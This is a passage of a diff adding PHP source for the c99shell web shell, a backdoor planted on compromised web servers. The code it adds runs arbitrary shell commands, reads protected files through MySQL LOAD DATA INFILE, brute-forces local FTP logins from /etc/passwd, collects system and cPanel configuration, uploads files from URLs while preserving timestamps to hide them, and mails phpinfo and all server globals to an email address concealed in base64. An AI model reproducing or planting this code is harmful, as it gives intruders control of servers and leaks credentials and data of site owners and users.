"INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {echo "
    Create new DB:
     
    View File:
     
    ";} + if (!empty($sql_act)) + { + echo "
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = true; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
